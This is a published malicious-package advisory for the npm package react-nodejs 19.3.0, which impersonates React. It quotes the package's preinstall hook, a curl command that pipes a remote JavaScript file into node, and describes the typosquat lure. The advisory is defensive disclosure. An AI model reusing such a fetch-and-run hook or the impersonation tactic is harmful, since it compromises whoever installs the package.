MAL-2026-17294

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-nodejs/MAL-2026-17294.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-17294
Published
2026-09-29T22:18:52Z
Modified
2026-09-29T22:45:04Z
Summary
Malicious code in react-nodejs (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481)

package.json declares a preinstall lifecycle hook that runs curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node, fetching a JavaScript file from an unrelated third-party Codeberg user's repository on a mutable branch (proxied through web.archive.org) and executing it in Node on the installer's machine at npm install time. The fetched content is unpinned, unverified, and controlled by an account with no relationship to the React publisher. The package additionally impersonates React: name react-nodejs, description copied from React, homepage set to https://react.dev/, and repository pointing at github.com/react/react.git, while being published by an unrelated author — a typosquat lure amplifying the install-time remote code execution.

Database specific
{
    "malicious-packages-origins":  [
        {
            "id":  "IN-MAL-2026-020688",
            "import_time":  "2026-09-29T22:41:05.688026468Z",
            "modified_time":  "2026-09-29T22:18:52Z",
            "sha256":  "5777ca86863da9fabb9da8e1a0d6c2f30f05533265624b2da07a8d0804930481",
            "source":  "amazon-inspector",
            "versions":  [
                "19.3.0"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / react-nodejs

Package

Affected ranges

Affected versions

19.*
19.3.0

Database specific

cwes
[
    {
        "cweId":  "CWE-506",
        "description":  "The product contains code that appears to be malicious in nature.",
        "name":  "Embedded Malicious Code"
    }
]
indicators
{
    "evidence_files":  [
        {
            "path":  "package.json",
            "sha256":  "4ce8de223918656f7d92d0d51f7ecb32334d848189225e96e871d43e452fa3c7",
            "tlsh":  "43210919cda48cb31ad56b9a6c3a1186a31d545f0c493e4cb78a842e5f4d0df50fb21c"
        }
    ],
    "package_integrity":  [
        {
            "filename":  "react-nodejs-19.3.0.tgz",
            "hashes":  {
                "sha1":  "030d07792f9dc3f792a2112fc1ab24d2b43a7a29",
                "sha512_sri":  "sha512-ATi8XqGT+kcozEl79pCL+ZH5bTfr2+6OeEzB3k/KScvbn9ZGduLcuP819loUvnheFux8uocdLx0Uvox69Ijcpw=="
            }
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-nodejs/MAL-2026-17294.json"